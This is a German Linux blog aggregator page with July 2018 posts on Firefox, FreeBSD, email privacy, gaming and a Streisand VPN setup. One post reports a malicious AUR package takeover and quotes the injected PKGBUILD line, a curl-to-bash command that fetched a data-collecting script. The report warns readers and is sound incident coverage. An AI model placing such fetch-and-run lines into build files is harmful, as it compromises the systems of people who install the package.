ubuntuusers.de

8. Juli 2018

Als Nutzer von Arch und insbesondere von AUR bekommt es öfters zu hören, dass man die PKGBUILD-Dateien vor dem Installieren prüfen soll. Gestern Abend hat sich gezeigt wie wichtig dies ist.

So ist im AUR beispielsweise acroread vorhanden. Das Paket war verwaist und wurde gestern von einem Nutzer Namens xeactor übernommen. Soweit kein Problem. Allerdings hat er in die PKGBUILD-Datei curl -s https://ptpb.pw/~x|bash -& eingetragen. Mit den Script wird ein systemd-Dienst angelegt über den Daten des kompromittierten Systems gesammelt und und Pastebin gesendet werden. Der Nutzer hat aber glücklicherweise Fehler beim erstellen des Scripts gemacht. So ist $uploader nicht vorhanden, so dass das Hochladen fehlschlägt. Zudem hat xeactor seinen Pastebin-API-Key im Klartext eingetragen.

Da die gesammelten Daten alle relativ unkritisch sind ist es allerdings fraglich was xeactor hiermit erreichen wollte. Eventuell wollte er “nur” demonstrieren wie wichtig es ist, PKBUILD-Dateien im AUR immer zu prüfen. Denn prinzipiell hätte er deutlich mehr Schaden anrichten können.

Neben acroread waren auch noch ein paar andere verwaiste Pakete betroffen. Die Änderungen wurden inzwischen wieder rückgängig gemacht und der Nutzer gesperrt. Aufgrund solcher Vorkommnisse sollte man die Mailing-List aur-general abonieren.

7. Juli 2018

Ein neuer unabhängiger Benchmark von PSPDFKit bestätigt die beeindruckende Geschwindigkeit von WebAssembly in Firefox: Mozillas Browser stellt sämtliche Browser, einschließlich Google Chrome, deutlich in den Schatten.

WebAssembly, oder kurz: wasm, ist ein neues Binärformat für das Web, entwickelt von Mozilla, Google, Microsoft und Apple in einer W3C Community Group. Ähnlich wie bei Mozillas asm.js oder Googles PNaCl handelt es sich dabei um das Resultat kompilierten Codes und soll die Performance von Webanwendungen beinahe auf das Niveau nativer Anwendungen heben.

Firefox war nicht nur der erste Browser mit WebAssembly-Unterstützung, Mozilla hatte auch bei der Performance von WebAssembly von Beginn an eine Vorreiter-Rolle. Dies bestätigt sich nun auch in einem neuen und unabhängigen Benchmark der Macher von PSPDFKit. Vor ein paar Monaten veröffentlichte PSPDFKit eine Version seines Web-SDKs, welche WebAssembly zum Rendern von PDF-Dateien im Browser verwendet. Entsprechend ist man bei PSPDFKit natürlich an der WebAssembly-Performance interessiert und hat einen Benchmark erstellt, der den Anspruch hat, eine reale Nutzung zu simulieren und nicht nur ein praxisferner Benchmark zu sein.

Die folgenden Grafiken zeigen Firefox, Chrome und Safari auf macOS respektive Firefox, Chrome und Microsoft Edge auf Windows. Während Firefox in den Messungen beim JavaScript-Fallback wenig überzeugt, sind die Werte für WebAssembly umso beeindruckender. Selbst der noch gar nicht erschienene Chrome 69, welcher gegenüber der aktuellen Chrome-Version nicht unwesentliche Performance-Verbesserungen für WebAssembly bereithält, ist auf Windows noch immer fast halb so langsam wie Firefox 61 und auf macOS ist der Unterschied zu Firefox 61 noch deutlicher. Safari auf macOS und Microsoft Edge auf Windows sind deutlich abgeschlagen die langsamsten WebAssembly-Browser in diesem Benchmark und spielen nicht einmal ansatzweise in der gleichen Liga mit.

Hinweis zu den Diagrammen: Je niedriger die Balken, desto besser.

WebAssembly-Performance Firefox

WebAssembly-Performance Firefox

Der Beitrag WebAssembly-Performance: Firefox stellt Chrome und alle anderen Browser in den Schatten erschien zuerst auf soeren-hentzschel.at.

Vergangene Woche stand wieder die gute alte E-Mail im Fokus der Sicherheitsdebatte. Schon wieder möchte man sagen, nachdem im Zuge der EFAIL-Geschichte (siehe: Kommentar: EFAIL - Nebelkerzen und was ist eigentliche eine Lücke?) die E-Mail mal wieder gestorben ist - zumindest für private Kommunikation. Nun ist nun auch klar, dass manch großer Maildienstleister auf die Privatsphäre der Anwender pfeift und andere der systematischen Überwachung den Weg bereiten.

Die erste Meldung kam vom Software-Giganten aus Redmond. E-Mails und auch Microsoft-Produkte allgemein haben immer seltener Privatanwender zum Ziel, sondern finden sich immer häufiger im ausschließlichen Businesseinsatz. Um der vollkommenen Kontrolle der Angestellten den Weg zu bereiten hat Microsoft daher eine API in seine Office 365 Lösung implementiert, die eine exakte Auswertung des Mail- und Arbeitsverhaltens ermöglicht.

Im Grunde genommen ist das nicht wirklich neu. Administratoren konnten schon immer ziemlich exakt nachvollziehen, wer, wann, wo und wie eine E-Mail verfasst, weitergeleitet, gelesen, gelöscht hat. Neu ist, dass man diese Funktion auf dem Silbertablett anbietet. Glücklich derjenige, der in einer Firma mit Personal-/Betriebsrat arbeitet, die den Gebrauch solcher Funktionen unterbindet oder an hohe Auflagen koppelt.

Google bietet zwar keine detaillierte Auswertung für die Personalabteilung - was möglicherweise auch daran liegt, dass GMail in Firmen nicht so verbreitet ist - sondern ermöglicht das Mitlesen durch Dritte. Hier muss der Nutzer zwar die Erlaubnis geben oder eine entsprechende App nutzen, die sich wiederum durch entsprechende AGBs absichert. Es spricht jedoch Bände, dass man erstens so eine Funktion überhaupt implementiert und zweitens keinerlei Problem darin sieht. Privatsphäre ist so 20. Jahrhundert...

Nicht alles was man kann, sollte man auch umsetzen. In Anbetracht der technischen Möglichkeiten unserer Zeit sollte Ethik eine deutlich größere Rolle spielen. Sowohl in der Ausbildung der so genannten high potentials in den MINT-Fächern, wie auch in Firmen allgemein. Solche Funktionen implementiert man einfach nicht!

Da gibt es nicht viel zu diskutieren. Erstens sollte man zu einem vertrauenswürdigen Maildienstleister wechseln (siehe: E-Mail Dienstleister mit Fokus auf Datenschutz) und zweitens seine E-Mails verschlüsseln (siehe: E-Mail Kommunikation absichern). Trotz der angeschlagenen Sicherheit von OpenPGP und S/MIME ist das zur Zeit immer noch besser als der offen einsehbare Inhalt, abgelegt bei irgendwelchen Datenkraken.


Bilder:

Einleitungs- und Beitragsbild von ribkhan via pixaybay / Lizenz: CC0 Creative Commons

"

Auf einenm Rechner ist sowohl Windows als auch Linux installiert. Der Datenaustausch erfolgt über eine NTFS-Partition, die unter Linux mit ntfs-3g eingebunden wird. Seit einiger Zeit wird die Partition aber plötzlich nur noch mit Leserechten gemountet.

Nach einigem hin und her (ftab geprüft, nachgeschaut ob ntfs-3g noch installiert ist usw.) habe ich festgestellt, das Windows die Ursache ist. Bis vor kurzem lief auf dem Rechner noch Windows 7 und wurde nun über das kostenlose Upgrade auf Windows 10 aktualisiert (ja das funktioniert immer noch). Unter Windows 10 gibt es so eine nette Funktion namens Schnellstart. Und genau diese Funktion bewirkt, dass ntfs-3g die Partitionen nur mit Leserechten mountet um Probleme zu vermeiden.

Da es bei dem betreffenden Rechner egal ist, ob der Rechner nun in 15 oder 20 Sekunden startet, ist die Lösung recht einfach. Man deaktiviert den Schnellstart. Hierfür öffnet man die Systemsteuerung und wählt unter Hardware und Sound die Energieoptionen aus. Dort gibt es den Punkt “Auswählen, was beim Drücken von Netzschaltern passieren soll”. Hier findet man dann unter “Einstellungen für das Herunterfahren” die Option “Schnellstart aktivieren (empfohlen)”. Leider ist dieser normalerweise ausgegraut, so dass man hier den Haken nicht entfernen kann. Von daher muss man erst noch auf den Link “Einige Einstellungen sind momentan nicht verfügbar” klicken. Danach kann man den Haken bei “Schnellstart aktivieren (empfohlen)” entfernen und die Einstellungen speichern. Nach einem Neustart von Linux sollte nun die NTFS-Partition wie gewohnt mit Schreibrechten gemountet werden.

Linux ist heute vielen ein Begriff - selbst solchen, die es selbst nicht nutzen. Die zahlreichen BSD-Variationen sind hingegen nur unter Insidern ein Thema. Eigentlich zu unrecht, Varianten wie FreeBSD sind schon lange nicht mehr unbenutzbar oder funktional eingeschränkt. In vielerlei Hinsicht kann es auf dem Desktop mit Linux gleichziehen. Umsteiger sollten dennoch lernwillig sein, die oberflächliche Nähe zu Linux täuscht.

FreeBSD im Vergleich mit Linux

Warum der Vergleich mit Linux? FreeBSD ist nicht ganz einfach zu bedienen und erfordert viel Handarbeit. Die Handbücher sind zwar sehr gut, aber auch technisch anspruchsvoll. FreeBSD-Interessenten werden daher meist bereits von einem alternativen Betriebssystem wie Linux kommen und eher selten von Windows.

BSD - Mehr als nur ein Kernel

Linux bezeichnet nur den Kernel. Dieses Mantra ignoriert die Linux-Community immer wieder gerne, wie schon der inflationäre Gebrauch von Linux im Namen vieler Distributionen illustriert. Lediglich Debian präzisiert mit dem GNU/Linux die Ursprünge der Distribution. Linux ist in der Form, wie es die meisten Anwender auf dem Desktop einsetzen, eine Komposition unterschiedlicher Projekte. Neben dem Linux-Kernel gehören dazu viele Tools aus dem GNU-Projekt und andere zentrale Projekte jüngeren Datums wie systemd. Die Zusammenstellung übernimmt der Distributor, der aber meist weder großen Einfluss auf die Entwicklung hat, noch unbedingt langfristig an einem Werkzeug festhält. Große Updates mit Kompatibilitätsbrüchen gehören quasi zur DNA der Linux-Distributionen und sind - wenn man sich das Echo anhört - ebenso oft ein Ärgernis.

BSD Systeme sind hingegen mehr als lediglich der Kernel. Es gibt hier keine organisatorische Trennung zwischen Kernel, zentralen Bibliotheken sowie dem so genannten "Userland". BSD-Varianten wie FreeBSD fassen diese alle zusammen und entwickeln sie gemeinsam, wodurch ein hohes Maß an Konsistenz angestrebt wird. Dieses Userland unterscheidet sich stark von den GNU-Umgebungen der Linux Distributionen, weshalb man nicht zu viele Gemeinsamkeiten erwarten sollte.

Paketmanager nur für Drittanwedungen

Diese grundsätzliche Trennung zieht sich durch das gesamte System. Mit pkg hat FreeBSD zwar einen Paketmanager für Binärpakete, der mit seinen Pendants unter Linux vergleichbar ist, dieser ist jedoch nicht für das Basissystem verantwortlich. Das eigentliche FreeBSD-Kernsysteme wird mittels des Befehls freebsd-update aktualisiert. Bei einer Neuinstallation ist pkg standardmäßig nicht einmal installiert. Mittels pkg verwaltet man lediglich die zusätzlich installierten Programme aus den ports, was jedoch unter anderem auch den Desktop und vieles weiteres umfasst.

Eine weitere Möglichkeit ist die angeleitete Kompilierung direkt aus den Quellen. Man kennt so etwas von Arch Linux AUR oder Gentoo. Das ist aber dank der Binärpakete und pkg nicht mehr unbedingt notwendig, ältere Anleitungen berücksichtigten dies teilweise noch nicht.

FreeBSD trennt daher auch in der Administration strikt zwischen FreeBSD-Kernsystem und (portierten) Anwendungen aus dem OSS-Universum. Zukünftig ist angeblich geplant das Kernsystem auch mit pkg verwalten zu können, aber vor der Veröffentlichung von FreeBSD 12 im kommenden Jahr ist das nicht einmal experimentell verfügbar.

Die Trennung zwischen Kernsystem und Installation via pkg ist im Dateisystem abgebildet. Installierte Programme liegen in einer Struktur unterhalb von /usr/local und nicht verteilt im System wie bei Linux. Lediglich das Kernsystem liegt direkt unterhalb von /.

Freies System ohne Autopilot

FreeBSD ist alles andere als kompliziert zu installieren. Die Installationsroutine ist optionsarm, aber leichter zu absolvieren als beispielsweise bei Arch Linux. Die Nachinstallation moderner Desktopumgebungen wie z. B. Plasma 5 ist mittels pkg vollkommen problemlos.

In den letzten Jahren haben die Entwickler im Linux-Umfeld jedoch viel getan um Prozesse zu automatisieren. Manuelle Konfigurationsarbeit in /etc ist nicht mehr unbedingt erforderlich, selbst bei fortgeschrittenen Distributionen. FreeBSD verlangt hier weiterhin viel Handarbeit und erinnert damit stark an Linux Distributionen vor 5-10 Jahren. Dienste müssen beispielsweise manuell in /etc/rc.conf aktiviert, Sprachprofile in /etc/profile gewählt werden.

Treiber

Lange Zeit standen FreeBSD & Co im Ruf quasi überhaupt keine echte Hardware zu unterstützen. Aus eigener Erfahrung lässt sich das nicht bestätigen. Hardware, die unter Linux mit normalen quelloffenen Treibern angesprochen werden kann - und das ist inzwischen eine Menge - läuft auch unter FreeBSD. Proprietäre Hardware im WLAN- oder Grafik-Bereich mag immer noch Probleme bereiten - hier fehlen mir die Testgeräte. Für die Peripherie stehen CUPS und die Foomatic/Gutenprint-Treiber zur Verfügung. Wer hier in der Vergangenheit auf Kompatibilität geachtet hat, kann seine Hardware auch unter FreeBSD nutzen.

Software

Die Auswahl bei freier Software ist gut, da die POSIX-Kompatibilität hier den Portieraufwand minimiert. Der Umfang der via pkg installierbaren Produkte lässt sich mit openSUSE Leap vergleichen, kommt also nicht ganz an Debian und seine parasitären Derivate heran. Problematisch sind aber proprietäre Programme wie Spotify oder Skype, die sich auch unter Linux großer Beliebtheit erfreuen. DRM-Erweiterungen für Streamdienste haben in den letzten Jahren auch Einzug in Linux gehalten, sind aber für FreeBSD immer noch nicht verfügbar.

Die Administration des Systems erfolgt zudem weiterhin primär auf der Konsole. Es gibt kaum grafische Verwaltungswerkzeuge, wie sie inzwischen die meisten Linux-Distributionen haben.

Zusammengefasst

FreeBSD ist durchaus benutzbar - auch für den Desktop. Der Funktionsumfang und die Softwareauswahl kommt an die meisten Linux-Distributionen heran. Insbesondere wer bereits jetzt seine Linux Distribution gerne bis ins letzte Detail händisch konfiguriert oder generell die Konsole bevorzugt dürfte sich schnell einarbeiten.

Reizvoll ist die strikte Trennung zwischen dem FreeBSD-Basissystem und den Anwendungen. Dadurch erhält man eine stabile Basis, die sehr konservativ entwickelt wird, kombiniert mit einer aktuellen Desktopumgebung und aktuellen Endanwenderprogrammen.

Wer aber bereits mit Linux zufrieden ist und keinen ausgeprägten Spieltrieb hat, kann BSD auch weiterhin getrost ignorieren. Die Vorteile eines Wechsels sind eher gering, vieles ist halt einfach nur anders. Wem Linux aber zu langweilig ist, zu wenig händische Konfigurationsmöglichkeit bietet oder wer von aktuellen Entwicklungen frustriert ist, der sollte sich FreeBSD mal ansehen.


Bilder:

Einleitungs- und Beitragbild von stevepb via pixabay / Lizenz: CC0 Creative Commons

"

Linux ist heute vielen ein Begriff - selbst solchen, die es selbst nicht nutzen. Die zahlreichen BSD-Variationen sind hingegen nur unter Insidern ein Thema. Eigentlich zu unrecht, Varianten wie FreeBSD sind schon lange nicht mehr unbenutzbar oder funktional eingeschränkt. In vielerlei Hinsicht kann es auf dem Desktop mit Linux gleichziehen. Umsteiger sollten dennoch lernwillig sein, die oberflächliche Nähe zu Linux täuscht.

FreeBSD im Vergleich mit Linux

Warum der Vergleich mit Linux? FreeBSD ist nicht ganz einfach zu bedienen und erfordert viel Handarbeit. Die Handbücher sind zwar sehr gut, aber auch technisch anspruchsvoll. FreeBSD-Interessenten werden daher meist bereits von einem alternativen Betriebssystem wie Linux kommen und eher selten von Windows.

BSD - Mehr als nur ein Kernel

Linux bezeichnet nur den Kernel. Dieses Mantra ignoriert die Linux-Community immer wieder gerne, wie schon der inflationäre Gebrauch von Linux im Namen vieler Distributionen illustriert. Lediglich Debian präzisiert mit dem GNU/Linux die Ursprünge der Distribution. Linux ist in der Form, wie es die meisten Anwender auf dem Desktop einsetzen, eine Komposition unterschiedlicher Projekte. Neben dem Linux-Kernel gehören dazu viele Tools aus dem GNU-Projekt und andere zentrale Projekte jüngeren Datums wie systemd. Die Zusammenstellung übernimmt der Distributor, der aber meist weder großen Einfluss auf die Entwicklung hat, noch unbedingt langfristig an einem Werkzeug festhält. Große Updates mit Kompatibilitätsbrüchen gehören quasi zur DNA der Linux-Distributionen und sind - wenn man sich das Echo anhört - ebenso oft ein Ärgernis.

BSD Systeme sind hingegen mehr als lediglich der Kernel. Es gibt hier keine organisatorische Trennung zwischen Kernel, zentralen Bibliotheken sowie dem so genannten "Userland". BSD-Varianten wie FreeBSD fassen diese alle zusammen und entwickeln sie gemeinsam, wodurch ein hohes Maß an Konsistenz angestrebt wird. Dieses Userland unterscheidet sich stark von den GNU-Umgebungen der Linux Distributionen, weshalb man nicht zu viele Gemeinsamkeiten erwarten sollte.

Paketmanager nur für Drittanwedungen

Diese grundsätzliche Trennung zieht sich durch das gesamte System. Mit pkg hat FreeBSD zwar einen Paketmanager für Binärpakete, der mit seinen Pendants unter Linux vergleichbar ist, dieser ist jedoch nicht für das Basissystem verantwortlich. Das eigentliche FreeBSD-Kernsysteme wird mittels des Befehls freebsd-update aktualisiert. Bei einer Neuinstallation ist pkg standardmäßig nicht einmal installiert. Mittels pkg verwaltet man lediglich die zusätzlich installierten Programme aus den ports, was jedoch unter anderem auch den Desktop und vieles weiteres umfasst.

Eine weitere Möglichkeit ist die angeleitete Kompilierung direkt aus den Quellen. Man kennt so etwas von Arch Linux AUR oder Gentoo. Das ist aber dank der Binärpakete und pkg nicht mehr unbedingt notwendig, ältere Anleitungen berücksichtigten dies teilweise noch nicht.

FreeBSD trennt daher auch in der Administration strikt zwischen FreeBSD-Kernsystem und (portierten) Anwendungen aus dem OSS-Universum. Zukünftig ist angeblich geplant das Kernsystem auch mit pkg verwalten zu können, aber vor der Veröffentlichung von FreeBSD 12 im kommenden Jahr ist das nicht einmal experimentell verfügbar.

Die Trennung zwischen Kernsystem und Installation via pkg ist im Dateisystem abgebildet. Installierte Programme liegen in einer Struktur unterhalb von /usr/local und nicht verteilt im System wie bei Linux. Lediglich das Kernsystem liegt direkt unterhalb von /.

Freies System ohne Autopilot

FreeBSD ist alles andere als kompliziert zu installieren. Die Installationsroutine ist optionsarm, aber leichter zu absolvieren als beispielsweise bei Arch Linux. Die Nachinstallation moderner Desktopumgebungen wie z. B. Plasma 5 ist mittels pkg vollkommen problemlos.

In den letzten Jahren haben die Entwickler im Linux-Umfeld jedoch viel getan um Prozesse zu automatisieren. Manuelle Konfigurationsarbeit in /etc ist nicht mehr unbedingt erforderlich, selbst bei fortgeschrittenen Distributionen. FreeBSD verlangt hier weiterhin viel Handarbeit und erinnert damit stark an Linux Distributionen vor 5-10 Jahren. Dienste müssen beispielsweise manuell in /etc/rc.conf aktiviert, Sprachprofile in /etc/profile gewählt werden.

Treiber

Lange Zeit standen FreeBSD & Co im Ruf quasi überhaupt keine echte Hardware zu unterstützen. Aus eigener Erfahrung lässt sich das nicht bestätigen. Hardware, die unter Linux mit normalen quelloffenen Treibern angesprochen werden kann - und das ist inzwischen eine Menge - läuft auch unter FreeBSD. Proprietäre Hardware im WLAN- oder Grafik-Bereich mag immer noch Probleme bereiten - hier fehlen mir die Testgeräte. Für die Peripherie stehen CUPS und die Foomatic/Gutenprint-Treiber zur Verfügung. Wer hier in der Vergangenheit auf Kompatibilität geachtet hat, kann seine Hardware auch unter FreeBSD nutzen.

Software

Die Auswahl bei freier Software ist gut, da die POSIX-Kompatibilität hier den Portieraufwand minimiert. Der Umfang der via pkg installierbaren Produkte lässt sich mit openSUSE Leap vergleichen, kommt also nicht ganz an Debian und seine parasitären Derivate heran. Problematisch sind aber proprietäre Programme wie Spotify oder Skype, die sich auch unter Linux großer Beliebtheit erfreuen. DRM-Erweiterungen für Streamdienste haben in den letzten Jahren auch Einzug in Linux gehalten, sind aber für FreeBSD immer noch nicht verfügbar.

Die Administration des Systems erfolgt zudem weiterhin primär auf der Konsole. Es gibt kaum grafische Verwaltungswerkzeuge, wie sie inzwischen die meisten Linux-Distributionen haben.

Zusammengefasst

FreeBSD ist durchaus benutzbar - auch für den Desktop. Der Funktionsumfang und die Softwareauswahl kommt an die meisten Linux-Distributionen heran. Insbesondere wer bereits jetzt seine Linux Distribution gerne bis ins letzte Detail händisch konfiguriert oder generell die Konsole bevorzugt dürfte sich schnell einarbeiten.

Reizvoll ist die strikte Trennung zwischen dem FreeBSD-Basissystem und den Anwendungen. Dadurch erhält man eine stabile Basis, die sehr konservativ entwickelt wird, kombiniert mit einer aktuellen Desktopumgebung und aktuellen Endanwenderprogrammen.

Wer aber bereits mit Linux zufrieden ist und keinen ausgeprägten Spieltrieb hat, kann BSD auch weiterhin getrost ignorieren. Die Vorteile eines Wechsels sind eher gering, vieles ist halt einfach nur anders. Wem Linux aber zu langweilig ist, zu wenig händische Konfigurationsmöglichkeit bietet oder wer von aktuellen Entwicklungen frustriert ist, der sollte sich FreeBSD mal ansehen.


Bilder:

Einleitungs- und Beitragbild von stevepb via pixabay / Lizenz: CC0 Creative Commons

"

5. Juli 2018

Mozilla wird in Kürze mit der Auslieferung von Firefox 61.0.1 beginnen. Mit dem Update behebt Mozilla mehrere Probleme der Vorgängerversion.

Eines der behobenen Probleme von Firefox 61.0.1 betrifft die Seite, die beim Öffnen eines neuen Tabs erscheint sowie die Einstellungs-Seite dazu. Auf Systemen mit defekter IndexedDB-Datenbank im Profil konnte es vorkommen, dass der neue Tab komplett leer und der dazugehörige Abschnitt in den Firefox-Einstellungen unvollständig war. Ein weiterer Defekt in der Datenbank places.sqlite konnte in seltenen Fällen beim Update von Firefox 60 auf Firefox 61 einen Verlust der Lesezeichen verursachen.

Mit dem Update wurden außerdem Probleme bei der Wiedergabe von 1080p-Videos auf Twitch behoben sowie das Überschreiben der Firefox-Startseite via WebExtension, was unter bestimmten Umständen nicht funktionierte.

Die Option, Dateien von FTP-Servern via Kontextmenü-Eintrag auf einen Link herunterzuladen, funktioniert mit dem Update auf Firefox 61.0.1 wieder, ebenso das Öffnen heruntergeladener Dateien ohne Dateiendung auf Windows.

Außerdem wurde ein Fokus-Problem beim Öffnen von Popups behoben sowie ein Problem beim Laden von Webseiten, von welchem chinesische Nutzer mit aktivierten Werkzeugen für Barrierefreiheit betroffen waren.

Der Beitrag Mozilla veröffentlicht Firefox 61.0.1 und behebt diverse Probleme erschien zuerst auf soeren-hentzschel.at.

4. Juli 2018

Was hatte Zockertown lange nicht?

Richtig eine Besprechung eines coolen rundenbasierten Games.

Nun, da gibt es richtig gute Neuigkeiten.

 

Einer der Schöpfer und Hauptdesigner der originalen XCOM-Spiele, Julian Gollop hat im Rahmen einer Croud Gründungskampagne die Entwicklung von Phoenix Point begonnen. Erscheinungstermin wird wohl erst im Juni 2019 erscheinen.

Da ich erklärter XCOM Fanatiker bin, habe ich natürlich auch meinen Obulus geleistet. Als kleinen Dank kann ich seit dem 15.5. 2018 das sogenannte Backer Build 1.2 spielen. Und zwar nativ unter Linux.

Das Original ist ja von 1994, es lief noch mit DOS, Linux war da in etwa bei dem  Stand 1.0 und an eine Emulation von DOS war damals noch nicht zu denken, obwohl ich es bereits nutzte.

Doch nun zum Backer Build 1.2:

Es ist eine Mission "Fort Freiheit" spielbar, in ein paar interessanten Varianten.

Natürlich ähnelt das Spielgefühl dem der XCOM Reihe von Fireaxis, es gibt aber einen großen Unterschied.

Das Ziel/Schaden System ist neu erfunden, obwohl man sowas bereits in anderen Spielen gesehen hat, gab es das in dem Sinne nicht bei Xcom.

Man kann, wenn man will, frei zielen und einen Schwachpunkt in der Rüstung / Verteidigung des Gegners finden.

Neu (bzw. erneut wie im Original) gibt es Friendly Fire, wenn man nicht aufpasst, schiesst man seinem Kameraden in den Rücken, was der sicher nicht witzig findet, oder er bekommt einen Querschläger ab.

Ein zweiter Unterschied zum Original sind die Bossgegner, die aufzuhalten gelingt nur, wenn man gezielt Schwachpunkte aufspürt.

Munition ist ziemlich knapp, man findet aber Nachschub auf der Map

Im Netzt gibt es zu Hauf Videos, die ihr euch ansehen könnt, damit will ich euch nicht langweilen. Ich möchte nur ein paar Teilaspekte darstellen.

Ich bin über das aktuelle Marketing, wenn man es denn so nennen will positiv überrascht.

Es ist gestern der 2te Backer Build gewesen, der erste allergings mit einem Linux und Mac Client.

Es ist vorgesehen ca. alle 2 Monate oder auch häufiger einen neuen Build zur Verfügung zu stellen. Im Game kann - und soll- man bei aufgefallenen Bugs das Entwickler Team benachrichtigen.

Die hören allerdings nicht nur über diesen Kanal von den Spielern, sondern auch über ein eigens eingerichtetes Forum, wo die Spieler ihre Kritik und Vorschläge zum Game mitteilen und diskutieren.

Ich habe den Eindruck, dass dort auch auf die Strömungen reagiert wird und sie sich Mühe geben ein umfassendes großartiges Spiel abzuliefern.

Ein Screenshot utility ist für das Bug Meldesystem integriert, leider nicht für normale Screenshots, deshalb habe ich das Game im Fenstermodus gestartet, um leichte Screenshots zu machen. Das Game läuft aber in Fullscreen Mode einwandfrei.

Zum konkreten Backer Build schreibe ich noch später etwas mehr....

Update 4.7.2018 (ups, habe ich ja doch nicht.)

Egal, es gibt ein weiteres Build.

Im Telegrammstil kann der geneigte Leser es hier lesen, was ich dazu geschrieben habe.

https://www.linuxgaming.de/neuigkeiten-f6/phoenix-point-t6413.html

 

Ich hätte da ein Anliegen:

Wo sind denn meine Spielartikel besser aufgehoben?

Wie bisher hier im Blog, schliesslich habe ich hier keine Begrenzungen, was Grafiken betrifft und was ich schreibe, der Mod bin ich selber smile

Oder aber bei linuxgaming.de: Da seid ihr ja auch und warum 2 Quellen abgrasen, wenn man es an einer prominenten Stelle tun kann?

Ich freue mich auf Antworten

ITrig ist mehr oder weniger in der Sommerpause, also nicht wundern, wenn die eh schon rar gesäten Artikel noch weniger werden.

Bei der Hitze bietet sich leichte Kost an, darum der Hinweis auf einen netten ASCII Art Generator.

ASCII Art Generator

ASCII, der American Standard Code for Information Interchange sollte jedem bekannt sein, ebenso wie der Begriff ASCII Art, denn das hatten wir auf ITrig schon in Form von ASCII Art Logos auf der Kommandozeile oder ASCII-Webcam oder ASCIIflow-ASCII-Art per Editor im Browser erstellen.

Nun ein weiterer Ascii Art Generator, welcher euch verschieden Stile anbietet und selbsterklärend ist. Der entworfene Text kann einfach kopiert und weiterverwendet werden, nicht mehr und nicht weniger.


  _____   _______          _         
 |_   _| |__   __|        (_)        
   | |      | |     _ __   _    __ _ 
   | |      | |    | '__| | |  / _` |
  _| |_     | |    | |    | | | (_| |
 |_____|    |_|    |_|    |_|  \__, |
                                __/ |
                               |___/

ASCII Generator

STREISAND - Automatisierter Gateway-Server zum anonymen surfen

Es gibt in der heutigen Zeit gute Gründe, über VPN, einen Proxy oder über TOR ins Netz zu gehen. Sei es das öffentliche W-Lan im Lieblingscafé oder aber wesentlich relevanter, ihr befindet euch in einem Land, in dem kein freies Internet vorhanden ist bzw. gewisse Inhalte blockiert werden.
Nicht jeder Mensch kann oder möchte sich damit herumschlagen, beispielsweise einen OpenVPN-Server oder Proxy-Server einzurichten. Oft fehlt auch einfach das technische Verständnis bzw. Kenntnis.

STREISAND - Automatisierter Gateway-Server zum anonymen surfen
Streisand Übersicht

Streisand zeigt wie wundervoll OpenSource im Kampf gegen Unterdrückung und Zensur im Internet helfen kann. Mittels Streisand lassen sich in wenigen Minuten auf Wunsch unzählige Gateway-Server zum anonymen Zugriff einrichten, die euch folgende fertig konfigurierte Dinge bieten:

  • Passwortgeschützte Gateway-Seite mittels NGINX, erreichbar über SSL und Tor als Hidden service
  • Installation folgender Dienste: OpenSSH, OpenConnect / Cisco AnyConnect, OpenVPN, Shadowsocks, sslh, Stunnel, Tor, UFW, unattended-upgrades, WireGuard
  • Schritt-für-Schritt-Anleitungen zur Einrichtung der einzelnen Dienste
  • Sämtliche empfohlene Software wird gemirrored. Die Authentizität wird mittels Checksummen sichergestellt.
  • Alle genutzten Ports wurden so gewählt, dass Port-Blockierungen sich als schwierig erweisen. Als Beispiel verwendet OpenVPN Port 636, der auch von LDAP verwendet wird.

Eine deutlich umfangreichere Auflistung findet ihr in der Readme vom Projekt.

Die Installation ist zur Zeit leider noch mit Mehraufwand verbunden, was in Zukunft aber vereinfacht werden soll.
Der Normalfall sieht vor, dass von eurem Client aus mittels Ansible-Scripts ein neuer Server bei Amazon EC2, Azure, DigitalOcean, Google Compute Engine, Linode und Rackspace angelegt und automatisch eingerichtet wird. Es gibt aber auch die Möglichkeit lokal vorzugehen. Ich beschreibe im folgenden, wie ich vorgegangen bin.

Ausgangslage ist bei mir ein Cloud-Server von Hetzner. Voraussetzung ist - leider noch - ein Ubuntu 16.04-Image. Als erstes sorgt dafür, dass euer Server mittels DNS erreichbar ist, damit ihr später im Verlauf der Installation ein Let´s Encrypt-Zertifikat beantragen könnt.
Bevor wir mit der Installation beginnen, muss - sofern noch nicht vorhanden - mittels ssh-keygen ein SSH-Key erstellt werden. Übernimmt einfach die vorgeschlagenen Standard-Pfade.

Als erstes müssen wir nun ein ein paar benötigte Pakete installieren sowie das Projekt von Github clonen:

apt update
apt-get install git python-pip
git clone https://github.com/StreisandEffect/streisand.git && cd streisand

Mittels folgenden Befehl wird der Installer für Ansible gestartet. Dieser prüft zunächst auf fehlende Pakete und wird euch diese auflisten. Installiert diese wie angegeben.

./util/venv-dependencies.sh ./venv

Anschließend ruft ihr den Befehl erneut auf um die Installation durchzuführen. Ist die Installation durchgelaufen aktiviert ihr mit folgendem Befehl die installierten Ansible-Pakete:

source ./venv/bin/activate

Ein Ausführen von ./streisand startet nun die Installation. Wählt im Installer nun den Punkt 7. localhost (Advanced) aus und bestätigt im weiteren Verlauf die Warnung, dass ggf. Konfigurationen überschrieben werden können.

Wenn ihr gefragt werdet, ob ihr Änderungen an den Standard-Einstellungen vornehmen möchtet, widersprecht ihr mit Eingabe von no.

Ebenfalls werdet ihr im Verlauf der Installation nach Hostnamen des Servers und eurer E-Mail-Adresse gefragt. Beides ist lediglich von Bedeutung, sofern ihr Let's Encrypt nutzen wollt - was sich allerdings gerade bei solch einem Anwendungsfall empfiehlt.

STREISAND - Automatisierter Gateway-Server zum anonymen surfen
Informationen zum Streisand Zugang

Die Installation wird mit einer Fehlermeldung erfolgreich beendet werden, was daran liegt, dass der Installer versucht euch die HTML-Datei mit dem Zugangsdaten anzuzeigen.
Kopiert euch von eurem System den Ordner generated-docs herunter. Dieser enthält Informationen zur Firewall und die erwähnten Zugangsdaten.

Streisand ist nun eingerichtet und bereit zur Benutzung. :)

Sofern jemand in der anfangs beschriebenen Situation ist und solch eine Installation benötigt, schreibt mir eine E-Mail und ich helfe gerne weiter!

Es gibt in der heutigen Zeit gute Gründe, über VPN, einen Proxy oder über TOR ins Netz zu gehen. Sei es das öffentliche W-Lan im Lieblingscafé oder aber wesentlich relevanter, ihr befindet euch in einem Land, in dem kein freies Internet vorhanden ist bzw. gewisse Inhalte blockiert werden.
Nicht jeder Mensch kann oder möchte sich damit herumschlagen, beispielsweise einen OpenVPN-Server oder Proxy-Server einzurichten. Oft fehlt auch einfach das technische Verständnis bzw. Kenntnis.

alt

